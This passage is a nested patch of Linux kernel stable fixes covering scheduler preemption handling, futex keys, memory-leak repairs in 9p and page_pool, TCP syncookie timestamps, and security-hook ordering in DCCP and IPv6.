+ 	/* The subsequent bpf_timer_start/cancel() helpers won't be able to use
+ 	 * this timer, since it won't be initialized.
+ 	 */
+-	timer->timer = NULL;
++	WRITE_ONCE(timer->timer, NULL);
+ out:
+ 	__bpf_spin_unlock_irqrestore(&timer->lock);
+ 	if (!t)
+diff --git a/kernel/futex/core.c b/kernel/futex/core.c
+index 514e4582b8634..d4141b0547187 100644
+--- a/kernel/futex/core.c
++++ b/kernel/futex/core.c
+@@ -248,7 +248,17 @@ int get_futex_key(u32 __user *uaddr, bool fshared, union futex_key *key,
+ 	 *        but access_ok() should be faster than find_vma()
+ 	 */
+ 	if (!fshared) {
+-		key->private.mm = mm;
++		/*
++		 * On no-MMU, shared futexes are treated as private, therefore
++		 * we must not include the current process in the key. Since
++		 * there is only one address space, the address is a unique key
++		 * on its own.
++		 */
++		if (IS_ENABLED(CONFIG_MMU))
++			key->private.mm = mm;
++		else
++			key->private.mm = NULL;
++
+ 		key->private.address = address;
+ 		return 0;
+ 	}
+diff --git a/kernel/irq/matrix.c b/kernel/irq/matrix.c
+index 1698e77645acf..75d0ae490e29c 100644
+--- a/kernel/irq/matrix.c
++++ b/kernel/irq/matrix.c
+@@ -466,16 +466,16 @@ unsigned int irq_matrix_reserved(struct irq_matrix *m)
+ }
+ 
+ /**
+- * irq_matrix_allocated - Get the number of allocated irqs on the local cpu
++ * irq_matrix_allocated - Get the number of allocated non-managed irqs on the local CPU
+  * @m:		Pointer to the matrix to search
+  *
+- * This returns number of allocated irqs
++ * This returns number of allocated non-managed interrupts.
+  */
+ unsigned int irq_matrix_allocated(struct irq_matrix *m)
+ {
+ 	struct cpumap *cm = this_cpu_ptr(m->maps);
+ 
+-	return cm->allocated;
++	return cm->allocated - cm->managed_allocated;
+ }
+ 
+ #ifdef CONFIG_GENERIC_IRQ_DEBUGFS
+diff --git a/kernel/livepatch/core.c b/kernel/livepatch/core.c
+index 9ada0bc5247be..0e651fd4cc9fc 100644
+--- a/kernel/livepatch/core.c
++++ b/kernel/livepatch/core.c
+@@ -244,7 +244,7 @@ static int klp_resolve_symbols(Elf_Shdr *sechdrs, const char *strtab,
+ 		 * symbols are exported and normal relas can be used instead.
+ 		 */
+ 		if (!sec_vmlinux && sym_vmlinux) {
+-			pr_err("invalid access to vmlinux symbol '%s' from module-specific livepatch relocation section",
++			pr_err("invalid access to vmlinux symbol '%s' from module-specific livepatch relocation section\n",
+ 			       sym_name);
+ 			return -EINVAL;
+ 		}
+diff --git a/kernel/module/decompress.c b/kernel/module/decompress.c
+index 720e719253cd1..e1e9f69c5dd16 100644
+--- a/kernel/module/decompress.c
++++ b/kernel/module/decompress.c
+@@ -100,7 +100,7 @@ static ssize_t module_gzip_decompress(struct load_info *info,
+ 	s.next_in = buf + gzip_hdr_len;
+ 	s.avail_in = size - gzip_hdr_len;
+ 
+-	s.workspace = kmalloc(zlib_inflate_workspacesize(), GFP_KERNEL);
++	s.workspace = vmalloc(zlib_inflate_workspacesize());
+ 	if (!s.workspace)
+ 		return -ENOMEM;
+ 
+@@ -138,7 +138,7 @@ static ssize_t module_gzip_decompress(struct load_info *info,
+ out_inflate_end:
+ 	zlib_inflateEnd(&s);
+ out:
+-	kfree(s.workspace);
++	vfree(s.workspace);
+ 	return retval;
+ }
+ #elif CONFIG_MODULE_COMPRESS_XZ
+diff --git a/kernel/padata.c b/kernel/padata.c
+index de90af5fcbe6b..791d9cb07a501 100644
+--- a/kernel/padata.c
++++ b/kernel/padata.c
+@@ -1094,12 +1094,16 @@ EXPORT_SYMBOL(padata_alloc_shell);
+  */
+ void padata_free_shell(struct padata_shell *ps)
+ {
++	struct parallel_data *pd;
++
+ 	if (!ps)
+ 		return;
+ 
+ 	mutex_lock(&ps->pinst->lock);
+ 	list_del(&ps->list);
+-	padata_free_pd(rcu_dereference_protected(ps->pd, 1));
++	pd = rcu_dereference_protected(ps->pd, 1);
++	if (refcount_dec_and_test(&pd->refcnt))
++		padata_free_pd(pd);
+ 	mutex_unlock(&ps->pinst->lock);
+ 
+ 	kfree(ps);
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index 55d13980e29fd..18a4f8f28a25f 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -2463,9 +2463,11 @@ static int migration_cpu_stop(void *data)
+ 		 * it.
+ 		 */
+ 		WARN_ON_ONCE(!pending->stop_pending);
++		preempt_disable();
+ 		task_rq_unlock(rq, p, &rf);
+ 		stop_one_cpu_nowait(task_cpu(p), migration_cpu_stop,
+ 				    &pending->arg, &pending->stop_work);
++		preempt_enable();
+ 		return 0;
+ 	}
+ out:
+@@ -2746,12 +2748,13 @@ static int affine_move_task(struct rq *rq, struct task_struct *p, struct rq_flag
+ 			complete = true;
+ 		}
+ 
++		preempt_disable();
+ 		task_rq_unlock(rq, p, rf);
+-
+ 		if (push_task) {
+ 			stop_one_cpu_nowait(rq->cpu, push_cpu_stop,
+ 					    p, &rq->push_work);
+ 		}
++		preempt_enable();
+ 
+ 		if (complete)
+ 			complete_all(&pending->done);
+@@ -2817,12 +2820,13 @@ static int affine_move_task(struct rq *rq, struct task_struct *p, struct rq_flag
+ 		if (flags & SCA_MIGRATE_ENABLE)
+ 			p->migration_flags &= ~MDF_PUSH;
+ 
++		preempt_disable();
+ 		task_rq_unlock(rq, p, rf);
+-
+ 		if (!stop_pending) {
+ 			stop_one_cpu_nowait(cpu_of(rq), migration_cpu_stop,
+ 					    &pending->arg, &pending->stop_work);
+ 		}
++		preempt_enable();
+ 
+ 		if (flags & SCA_MIGRATE_ENABLE)
+ 			return 0;
+@@ -9255,9 +9259,11 @@ static void balance_push(struct rq *rq)
+ 	 * Temporarily drop rq->lock such that we can wake-up the stop task.
+ 	 * Both preemption and IRQs are still disabled.
+ 	 */
++	preempt_disable();
+ 	raw_spin_rq_unlock(rq);
+ 	stop_one_cpu_nowait(rq->cpu, __balance_push_cpu_stop, push_task,
+ 			    this_cpu_ptr(&push_work));
++	preempt_enable();
+ 	/*
+ 	 * At this point need_resched() is true and we'll take the loop in
+ 	 * schedule(). The next pick is obviously going to be the stop task
+diff --git a/kernel/sched/deadline.c b/kernel/sched/deadline.c
+index 9ce9810861ba5..389290e950bea 100644
+--- a/kernel/sched/deadline.c
++++ b/kernel/sched/deadline.c
+@@ -2460,9 +2460,11 @@ skip:
+ 		double_unlock_balance(this_rq, src_rq);
+ 
+ 		if (push_task) {
++			preempt_disable();
+ 			raw_spin_rq_unlock(this_rq);
+ 			stop_one_cpu_nowait(src_rq->cpu, push_cpu_stop,
+ 					    push_task, &src_rq->push_work);
++			preempt_enable();
+ 			raw_spin_rq_lock(this_rq);
+ 		}
+ 	}
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 612873ec2197f..2558ab9033bee 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -4279,22 +4279,6 @@ static inline unsigned long task_util_est(struct task_struct *p)
+ 	return max(task_util(p), _task_util_est(p));
+ }
+ 
+-#ifdef CONFIG_UCLAMP_TASK
+-static inline unsigned long uclamp_task_util(struct task_struct *p,
+-					     unsigned long uclamp_min,
+-					     unsigned long uclamp_max)
+-{
+-	return clamp(task_util_est(p), uclamp_min, uclamp_max);
+-}
+-#else
+-static inline unsigned long uclamp_task_util(struct task_struct *p,
+-					     unsigned long uclamp_min,
+-					     unsigned long uclamp_max)
+-{
+-	return task_util_est(p);
+-}
+-#endif
+-
+ static inline void util_est_enqueue(struct cfs_rq *cfs_rq,
+ 				    struct task_struct *p)
+ {
+@@ -4585,7 +4569,7 @@ static inline void update_misfit_status(struct task_struct *p, struct rq *rq)
+ 
+ static inline bool cfs_rq_is_decayed(struct cfs_rq *cfs_rq)
+ {
+-	return true;
++	return !cfs_rq->nr_running;
+ }
+ 
+ #define UPDATE_TG	0x0
+@@ -7279,7 +7263,7 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 	target = prev_cpu;
+ 
+ 	sync_entity_load_avg(&p->se);
+-	if (!uclamp_task_util(p, p_util_min, p_util_max))
++	if (!task_util_est(p) && p_util_min == 0)
+ 		goto unlock;
+ 
+ 	eenv_task_busy_time(&eenv, p, prev_cpu);
+@@ -7287,11 +7271,10 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 	for (; pd; pd = pd->next) {
+ 		unsigned long util_min = p_util_min, util_max = p_util_max;
+ 		unsigned long cpu_cap, cpu_thermal_cap, util;
+-		unsigned long cur_delta, max_spare_cap = 0;
++		long prev_spare_cap = -1, max_spare_cap = -1;
+ 		unsigned long rq_util_min, rq_util_max;
+-		unsigned long prev_spare_cap = 0;
++		unsigned long cur_delta, base_energy;
+ 		int max_spare_cap_cpu = -1;
+-		unsigned long base_energy;
+ 		int fits, max_fits = -1;
+ 
+ 		cpumask_and(cpus, perf_domain_span(pd), cpu_online_mask);
+@@ -7354,7 +7337,7 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 				prev_spare_cap = cpu_cap;
+ 				prev_fits = fits;
+ 			} else if ((fits > max_fits) ||
+-				   ((fits == max_fits) && (cpu_cap > max_spare_cap))) {
++				   ((fits == max_fits) && ((long)cpu_cap > max_spare_cap))) {
+ 				/*
+ 				 * Find the CPU with the maximum spare capacity
+ 				 * among the remaining CPUs in the performance
+@@ -7366,7 +7349,7 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 			}
+ 		}
+ 
+-		if (max_spare_cap_cpu < 0 && prev_spare_cap == 0)
++		if (max_spare_cap_cpu < 0 && prev_spare_cap < 0)
+ 			continue;
+ 
+ 		eenv_pd_busy_time(&eenv, cpus, p);
+@@ -7374,7 +7357,7 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 		base_energy = compute_energy(&eenv, pd, cpus, p, -1);
+ 
+ 		/* Evaluate the energy impact of using prev_cpu. */
+-		if (prev_spare_cap > 0) {
++		if (prev_spare_cap > -1) {
+ 			prev_delta = compute_energy(&eenv, pd, cpus, p,
+ 						    prev_cpu);
+ 			/* CPU utilization has changed */
+@@ -10730,13 +10713,15 @@ more_balance:
+ 				busiest->push_cpu = this_cpu;
+ 				active_balance = 1;
+ 			}
+-			raw_spin_rq_unlock_irqrestore(busiest, flags);
+ 
++			preempt_disable();
++			raw_spin_rq_unlock_irqrestore(busiest, flags);
+ 			if (active_balance) {
+ 				stop_one_cpu_nowait(cpu_of(busiest),
+ 					active_load_balance_cpu_stop, busiest,
+ 					&busiest->active_balance_work);
+ 			}
++			preempt_enable();
+ 		}
+ 	} else {
+ 		sd->nr_balance_failed = 0;
+diff --git a/kernel/sched/rt.c b/kernel/sched/rt.c
+index 576eb2f51f043..76bafa8d331a7 100644
+--- a/kernel/sched/rt.c
++++ b/kernel/sched/rt.c
+@@ -2109,9 +2109,11 @@ retry:
+ 		 */
+ 		push_task = get_push_task(rq);
+ 		if (push_task) {
++			preempt_disable();
+ 			raw_spin_rq_unlock(rq);
+ 			stop_one_cpu_nowait(rq->cpu, push_cpu_stop,
+ 					    push_task, &rq->push_work);
++			preempt_enable();
+ 			raw_spin_rq_lock(rq);
+ 		}
+ 
+@@ -2448,9 +2450,11 @@ skip:
+ 		double_unlock_balance(this_rq, src_rq);
+ 
+ 		if (push_task) {
++			preempt_disable();
+ 			raw_spin_rq_unlock(this_rq);
+ 			stop_one_cpu_nowait(src_rq->cpu, push_cpu_stop,
+ 					    push_task, &src_rq->push_work);
++			preempt_enable();
+ 			raw_spin_rq_lock(this_rq);
+ 		}
+ 	}
+diff --git a/kernel/trace/trace_kprobe.c b/kernel/trace/trace_kprobe.c
+index 56675294d7a3b..a34a4fcdab7b1 100644
+--- a/kernel/trace/trace_kprobe.c
++++ b/kernel/trace/trace_kprobe.c
+@@ -986,9 +986,9 @@ EXPORT_SYMBOL_GPL(kprobe_event_cmd_init);
+ /**
+  * __kprobe_event_gen_cmd_start - Generate a kprobe event command from arg list
+  * @cmd: A pointer to the dynevent_cmd struct representing the new event
++ * @kretprobe: Is this a return probe?
+  * @name: The name of the kprobe event
+  * @loc: The location of the kprobe event
+- * @kretprobe: Is this a return probe?
+  * @...: Variable number of arg (pairs), one pair for each field
+  *
+  * NOTE: Users normally won't want to call this function directly, but
+diff --git a/lib/kunit/executor.c b/lib/kunit/executor.c
+index 74982b83707ca..05ac4cdb6806a 100644
+--- a/lib/kunit/executor.c
++++ b/lib/kunit/executor.c
+@@ -102,8 +102,10 @@ static void kunit_free_suite_set(struct suite_set suite_set)
+ {
+ 	struct kunit_suite * const *suites;
+ 
+-	for (suites = suite_set.start; suites < suite_set.end; suites++)
++	for (suites = suite_set.start; suites < suite_set.end; suites++) {
++		kfree((*suites)->test_cases);
+ 		kfree(*suites);
++	}
+ 	kfree(suite_set.start);
+ }
+ 
+diff --git a/mm/filemap.c b/mm/filemap.c
+index 322aea78058a0..2d930470aacaa 100644
+--- a/mm/filemap.c
++++ b/mm/filemap.c
+@@ -2262,6 +2262,60 @@ out:
+ }
+ EXPORT_SYMBOL(filemap_get_folios_contig);
+ 
++/**
++ * filemap_get_folios_tag - Get a batch of folios matching @tag
++ * @mapping:    The address_space to search
++ * @start:      The starting page index
++ * @end:        The final page index (inclusive)
++ * @tag:        The tag index
++ * @fbatch:     The batch to fill
++ *
++ * Same as filemap_get_folios(), but only returning folios tagged with @tag.
++ *
++ * Return: The number of folios found.
++ * Also update @start to index the next folio for traversal.
++ */
++unsigned filemap_get_folios_tag(struct address_space *mapping, pgoff_t *start,
++			pgoff_t end, xa_mark_t tag, struct folio_batch *fbatch)
++{
++	XA_STATE(xas, &mapping->i_pages, *start);
++	struct folio *folio;
++
++	rcu_read_lock();
++	while ((folio = find_get_entry(&xas, end, tag)) != NULL) {
++		/*
++		 * Shadow entries should never be tagged, but this iteration
++		 * is lockless so there is a window for page reclaim to evict
++		 * a page we saw tagged. Skip over it.
++		 */
++		if (xa_is_value(folio))
++			continue;
++		if (!folio_batch_add(fbatch, folio)) {
++			unsigned long nr = folio_nr_pages(folio);
++
++			if (folio_test_hugetlb(folio))
++				nr = 1;
++			*start = folio->index + nr;
++			goto out;
++		}
++	}
++	/*
++	 * We come here when there is no page beyond @end. We take care to not
++	 * overflow the index @start as it confuses some of the callers. This
++	 * breaks the iteration when there is a page at index -1 but that is
++	 * already broke anyway.
++	 */
++	if (end == (pgoff_t)-1)
++		*start = (pgoff_t)-1;
++	else
++		*start = end + 1;
++out:
++	rcu_read_unlock();
++
++	return folio_batch_count(fbatch);
++}
++EXPORT_SYMBOL(filemap_get_folios_tag);
++
+ /**
+  * find_get_pages_range_tag - Find and return head pages matching @tag.
+  * @mapping:	the address_space to search
+diff --git a/mm/readahead.c b/mm/readahead.c
+index b10f0cf81d804..ba43428043a35 100644
+--- a/mm/readahead.c
++++ b/mm/readahead.c
+@@ -749,7 +749,8 @@ ssize_t ksys_readahead(int fd, loff_t offset, size_t count)
+ 	 */
+ 	ret = -EINVAL;
+ 	if (!f.file->f_mapping || !f.file->f_mapping->a_ops ||
+-	    !S_ISREG(file_inode(f.file)->i_mode))
++	    (!S_ISREG(file_inode(f.file)->i_mode) &&
++	    !S_ISBLK(file_inode(f.file)->i_mode)))
+ 		goto out;
+ 
+ 	ret = vfs_fadvise(f.file, offset, count, POSIX_FADV_WILLNEED);
+diff --git a/net/9p/client.c b/net/9p/client.c
+index af59c3f2ec2e7..a96e127ca4883 100644
+--- a/net/9p/client.c
++++ b/net/9p/client.c
+@@ -537,12 +537,14 @@ static int p9_check_errors(struct p9_client *c, struct p9_req_t *req)
+ 		return 0;
+ 
+ 	if (!p9_is_proto_dotl(c)) {
+-		char *ename;
++		char *ename = NULL;
+ 
+ 		err = p9pdu_readf(&req->rc, c->proto_version, "s?d",
+ 				  &ename, &ecode);
+-		if (err)
++		if (err) {
++			kfree(ename);
+ 			goto out_err;
++		}
+ 
+ 		if (p9_is_proto_dotu(c) && ecode < 512)
+ 			err = -ecode;
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 5218c4dfe0a89..d74fe13f3dceb 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -151,7 +151,7 @@ struct sk_buff *__hci_cmd_sync_sk(struct hci_dev *hdev, u16 opcode, u32 plen,
+ 	struct sk_buff *skb;
+ 	int err = 0;
+ 
+-	bt_dev_dbg(hdev, "Opcode 0x%4x", opcode);
++	bt_dev_dbg(hdev, "Opcode 0x%4.4x", opcode);
+ 
+ 	hci_req_init(&req, hdev);
+ 
+@@ -247,7 +247,7 @@ int __hci_cmd_sync_status_sk(struct hci_dev *hdev, u16 opcode, u32 plen,
+ 	skb = __hci_cmd_sync_sk(hdev, opcode, plen, param, event, timeout, sk);
+ 	if (IS_ERR(skb)) {
+ 		if (!event)
+-			bt_dev_err(hdev, "Opcode 0x%4x failed: %ld", opcode,
++			bt_dev_err(hdev, "Opcode 0x%4.4x failed: %ld", opcode,
+ 				   PTR_ERR(skb));
+ 		return PTR_ERR(skb);
+ 	}
+diff --git a/net/core/page_pool.c b/net/core/page_pool.c
+index 2396c99bedeaa..caf6d950d54ad 100644
+--- a/net/core/page_pool.c
++++ b/net/core/page_pool.c
+@@ -209,8 +209,12 @@ static int page_pool_init(struct page_pool *pool,
+ 		return -ENOMEM;
+ #endif
+ 
+-	if (ptr_ring_init(&pool->ring, ring_qsize, GFP_KERNEL) < 0)
++	if (ptr_ring_init(&pool->ring, ring_qsize, GFP_KERNEL) < 0) {
++#ifdef CONFIG_PAGE_POOL_STATS
++		free_percpu(pool->recycle_stats);
++#endif
+ 		return -ENOMEM;
++	}
+ 
+ 	atomic_set(&pool->pages_state_release_cnt, 0);
+ 
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 8dca4a7ca4a1f..73b1e0e53534e 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -3958,6 +3958,7 @@ static void skb_ts_finish(struct ts_config *conf, struct ts_state *state)
+ unsigned int skb_find_text(struct sk_buff *skb, unsigned int from,
+ 			   unsigned int to, struct ts_config *config)
+ {
++	unsigned int patlen = config->ops->get_pattern_len(config);
+ 	struct ts_state state;
+ 	unsigned int ret;
+ 
+@@ -3969,7 +3970,7 @@ unsigned int skb_find_text(struct sk_buff *skb, unsigned int from,
+ 	skb_prepare_seq_read(skb, from, to, TS_SKB_CB(&state));
+ 
+ 	ret = textsearch_find(config, &state);
+-	return (ret <= to - from ? ret : UINT_MAX);
++	return (ret + patlen <= to - from ? ret : UINT_MAX);
+ }
+ EXPORT_SYMBOL(skb_find_text);
+ 
+diff --git a/net/dccp/ipv4.c b/net/dccp/ipv4.c
+index 247179d4c8865..9fe6d96797169 100644
+--- a/net/dccp/ipv4.c
++++ b/net/dccp/ipv4.c
+@@ -628,9 +628,6 @@ int dccp_v4_conn_request(struct sock *sk, struct sk_buff *skb)
+ 	if (dccp_parse_options(sk, dreq, skb))
+ 		goto drop_and_free;
+ 
+-	if (security_inet_conn_request(sk, skb, req))
+-		goto drop_and_free;
+-
+ 	ireq = inet_rsk(req);
+ 	sk_rcv_saddr_set(req_to_sk(req), ip_hdr(skb)->daddr);
+ 	sk_daddr_set(req_to_sk(req), ip_hdr(skb)->saddr);
+@@ -638,6 +635,9 @@ int dccp_v4_conn_request(struct sock *sk, struct sk_buff *skb)
+ 	ireq->ireq_family = AF_INET;
+ 	ireq->ir_iif = READ_ONCE(sk->sk_bound_dev_if);
+ 
++	if (security_inet_conn_request(sk, skb, req))
++		goto drop_and_free;
++
+ 	/*
+ 	 * Step 3: Process LISTEN state
+ 	 *
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index 6fb34eaf1237a..e0b0bf75a46c2 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -359,15 +359,15 @@ static int dccp_v6_conn_request(struct sock *sk, struct sk_buff *skb)
+ 	if (dccp_parse_options(sk, dreq, skb))
+ 		goto drop_and_free;
+ 
+-	if (security_inet_conn_request(sk, skb, req))
+-		goto drop_and_free;
+-
+ 	ireq = inet_rsk(req);
+ 	ireq->ir_v6_rmt_addr = ipv6_hdr(skb)->saddr;
+ 	ireq->ir_v6_loc_addr = ipv6_hdr(skb)->daddr;
+ 	ireq->ireq_family = AF_INET6;
+ 	ireq->ir_mark = inet_request_mark(sk, skb);
+ 
++	if (security_inet_conn_request(sk, skb, req))
++		goto drop_and_free;
++
+ 	if (ipv6_opt_accepted(sk, skb, IP6CB(skb)) ||
+ 	    np->rxopt.bits.rxinfo || np->rxopt.bits.rxoinfo ||
+ 	    np->rxopt.bits.rxhlim || np->rxopt.bits.rxohlim) {
+diff --git a/net/hsr/hsr_forward.c b/net/hsr/hsr_forward.c
+index b71dab630a873..80cdc6f6b34c9 100644
+--- a/net/hsr/hsr_forward.c
++++ b/net/hsr/hsr_forward.c
+@@ -342,9 +342,7 @@ struct sk_buff *prp_create_tagged_frame(struct hsr_frame_info *frame,
+ 	skb = skb_copy_expand(frame->skb_std, 0,
+ 			      skb_tailroom(frame->skb_std) + HSR_HLEN,
+ 			      GFP_ATOMIC);
+-	prp_fill_rct(skb, frame, port);
+-
+-	return skb;
++	return prp_fill_rct(skb, frame, port);
+ }
+ 
+ static void hsr_deliver_master(struct sk_buff *skb, struct net_device *dev,
+diff --git a/net/ipv4/syncookies.c b/net/ipv4/syncookies.c
+index 26fb97d1d4d9a..f9514cf87649e 100644
+--- a/net/ipv4/syncookies.c
++++ b/net/ipv4/syncookies.c
+@@ -41,7 +41,6 @@ static siphash_aligned_key_t syncookie_secret[2];
+  * requested/supported by the syn/synack exchange.
+  */
+ #define TSBITS	6
+-#define TSMASK	(((__u32)1 << TSBITS) - 1)
+ 
+ static u32 cookie_hash(__be32 saddr, __be32 daddr, __be16 sport, __be16 dport,
+ 		       u32 count, int c)
+@@ -62,27 +61,22 @@ static u32 cookie_hash(__be32 saddr, __be32 daddr, __be16 sport, __be16 dport,
+  */
+ u64 cookie_init_timestamp(struct request_sock *req, u64 now)
+ {
+-	struct inet_request_sock *ireq;
+-	u32 ts, ts_now = tcp_ns_to_ts(now);
++	const struct inet_request_sock *ireq = inet_rsk(req);
++	u64 ts, ts_now = tcp_ns_to_ts(now);
+ 	u32 options = 0;
+ 
+-	ireq = inet_rsk(req);
+-
+ 	options = ireq->wscale_ok ? ireq->snd_wscale : TS_OPT_WSCALE_MASK;
+ 	if (ireq->sack_ok)
+ 		options |= TS_OPT_SACK;
+ 	if (ireq->ecn_ok)
+ 		options |= TS_OPT_ECN;
+ 
+-	ts = ts_now & ~TSMASK;
++	ts = (ts_now >> TSBITS) << TSBITS;
+ 	ts |= options;
+-	if (ts > ts_now) {
+-		ts >>= TSBITS;
+-		ts--;
+-		ts <<= TSBITS;
+-		ts |= options;
+-	}
+-	return (u64)ts * (NSEC_PER_SEC / TCP_TS_HZ);
++	if (ts > ts_now)
++		ts -= (1UL << TSBITS);
++
++	return ts * (NSEC_PER_SEC / TCP_TS_HZ);
+ }
+ 
+ 
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index d63942202493d..65dae3d43684f 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -6420,22 +6420,23 @@ reset_and_undo:
+ 
+ static void tcp_rcv_synrecv_state_fastopen(struct sock *sk)
+ {
++	struct tcp_sock *tp = tcp_sk(sk);
+ 	struct request_sock *req;
+ 
+ 	/* If we are still handling the SYNACK RTO, see if timestamp ECR allows
+ 	 * undo. If peer SACKs triggered fast recovery, we can't undo here.
+ 	 */
+-	if (inet_csk(sk)->icsk_ca_state == TCP_CA_Loss)
+-		tcp_try_undo_loss(sk, false);
++	if (inet_csk(sk)->icsk_ca_state == TCP_CA_Loss && !tp->packets_out)
++		tcp_try_undo_recovery(sk);
+ 
+ 	/* Reset rtx states to prevent spurious retransmits_timed_out() */
+-	tcp_sk(sk)->retrans_stamp = 0;
++	tp->retrans_stamp = 0;
+ 	inet_csk(sk)->icsk_retransmits = 0;
+ 
+ 	/* Once we leave TCP_SYN_RECV or TCP_FIN_WAIT_1,
+ 	 * we no longer need req so release it.
+ 	 */
+-	req = rcu_dereference_protected(tcp_sk(sk)->fastopen_rsk,
++	req = rcu_dereference_protected(tp->fastopen_rsk,
+ 					lockdep_sock_is_held(sk));
+ 	reqsk_fastopen_remove(sk, req, false);
+ 
+diff --git a/net/ipv4/tcp_metrics.c b/net/ipv4/tcp_metrics.c
+index 99ac5efe244d3..a7364ff8b558d 100644
+--- a/net/ipv4/tcp_metrics.c
++++ b/net/ipv4/tcp_metrics.c
+@@ -470,11 +470,15 @@ void tcp_init_metrics(struct sock *sk)
+ 	u32 val, crtt = 0; /* cached RTT scaled by 8 */
+ 
+ 	sk_dst_confirm(sk);
++	/* ssthresh may have been reduced unnecessarily during.
++	 * 3WHS. Restore it back to its initial default.
++	 */
++	tp->snd_ssthresh = TCP_INFINITE_SSTHRESH;
+ 	if (!dst)
+ 		goto reset;
+ 
+ 	rcu_read_lock();
+-	tm = tcp_get_metrics(sk, dst, true);
++	tm = tcp_get_metrics(sk, dst, false);
+ 	if (!tm) {
+ 		rcu_read_unlock();
+ 		goto reset;
+@@ -489,11 +493,6 @@ void tcp_init_metrics(struct sock *sk)
+ 		tp->snd_ssthresh = val;
+ 		if (tp->snd_ssthresh > tp->snd_cwnd_clamp)
+ 			tp->snd_ssthresh = tp->snd_cwnd_clamp;
+-	} else {
+-		/* ssthresh may have been reduced unnecessarily during.
+-		 * 3WHS. Restore it back to its initial default.
+-		 */
+-		tp->snd_ssthresh = TCP_INFINITE_SSTHRESH;
+ 	}
+ 	val = tcp_metric_get(tm, TCP_METRIC_REORDERING);
+ 	if (val && tp->reordering != val)
+@@ -908,7 +907,7 @@ static void tcp_metrics_flush_all(struct net *net)
+ 			match = net ? net_eq(tm_net(tm), net) :
+ 				!refcount_read(&tm_net(tm)->ns.count);
+ 			if (match) {
+-				*pp = tm->tcpm_next;
++				rcu_assign_pointer(*pp, tm->tcpm_next);
+ 				kfree_rcu(tm, rcu_head);
+ 			} else {
+ 				pp = &tm->tcpm_next;
+@@ -949,7 +948,7 @@ static int tcp_metrics_nl_cmd_del(struct sk_buff *skb, struct genl_info *info)
+ 		if (addr_same(&tm->tcpm_daddr, &daddr) &&
+ 		    (!src || addr_same(&tm->tcpm_saddr, &saddr)) &&
+ 		    net_eq(tm_net(tm), net)) {
+-			*pp = tm->tcpm_next;
++			rcu_assign_pointer(*pp, tm->tcpm_next);
+ 			kfree_rcu(tm, rcu_head);
+ 			found = true;
+ 		} else {
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index b2aa7777521f6..65abc92a81bd0 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -2714,10 +2714,12 @@ int udp_lib_setsockopt(struct sock *sk, int level, int optname,
+ 		case UDP_ENCAP_ESPINUDP_NON_IKE:
+ #if IS_ENABLED(CONFIG_IPV6)
+ 			if (sk->sk_family == AF_INET6)
+-				up->encap_rcv = ipv6_stub->xfrm6_udp_encap_rcv;
++				WRITE_ONCE(up->encap_rcv,
++					   ipv6_stub->xfrm6_udp_encap_rcv);
+ 			else
+ #endif
+-				up->encap_rcv = xfrm4_udp_encap_rcv;
++				WRITE_ONCE(up->encap_rcv,
++					   xfrm4_udp_encap_rcv);
+ #endif
+ 			fallthrough;
+ 		case UDP_ENCAP_L2TPINUDP:
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index ce2c5e728745f..3c2b2a85de367 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -161,7 +161,13 @@ ip6_finish_output_gso_slowpath_drop(struct net *net, struct sock *sk,
+ 		int err;
+ 
+ 		skb_mark_not_on_list(segs);
+-		err = ip6_fragment(net, sk, segs, ip6_finish_output2);
++		/* Last GSO segment can be smaller than gso_size (and MTU).
++		 * Adding a fragment header would produce an "atomic fragment",
++		 * which is considered harmful (RFC-8021). Avoid that.
++		 */
++		err = segs->len > mtu ?
++			ip6_fragment(net, sk, segs, ip6_finish_output2) :
++			ip6_finish_output2(net, sk, segs);
+ 		if (err && ret == 0)
+ 			ret = err;
+ 	}
+diff --git a/net/ipv6/syncookies.c b/net/ipv6/syncookies.c
+index 5014aa6634527..8698b49dfc8de 100644
+--- a/net/ipv6/syncookies.c
++++ b/net/ipv6/syncookies.c
+@@ -180,14 +180,15 @@ struct sock *cookie_v6_check(struct sock *sk, struct sk_buff *skb)
+ 	treq = tcp_rsk(req);
+ 	treq->tfo_listener = false;
+ 
+-	if (security_inet_conn_request(sk, skb, req))
+-		goto out_free;
+-
+ 	req->mss = mss;
+ 	ireq->ir_rmt_port = th->source;
+ 	ireq->ir_num = ntohs(th->dest);
+ 	ireq->ir_v6_rmt_addr = ipv6_hdr(skb)->saddr;
+ 	ireq->ir_v6_loc_addr = ipv6_hdr(skb)->daddr;
++
++	if (security_inet_conn_request(sk, skb, req))
++		goto out_free;
++
+ 	if (ipv6_opt_accepted(sk, skb, &TCP_SKB_CB(skb)->header.h6) ||
+ 	    np->rxopt.bits.rxinfo || np->rxopt.bits.rxoinfo ||
+ 	    np->rxopt.bits.rxhlim || np->rxopt.bits.rxohlim) {
+diff --git a/net/llc/llc_input.c b/net/llc/llc_input.c
+index 7cac441862e21..51bccfb00a9cd 100644
+--- a/net/llc/llc_input.c
++++ b/net/llc/llc_input.c
+@@ -127,8 +127,14 @@ static inline int llc_fixup_skb(struct sk_buff *skb)
+ 	skb->transport_header += llc_len;
+ 	skb_pull(skb, llc_len);
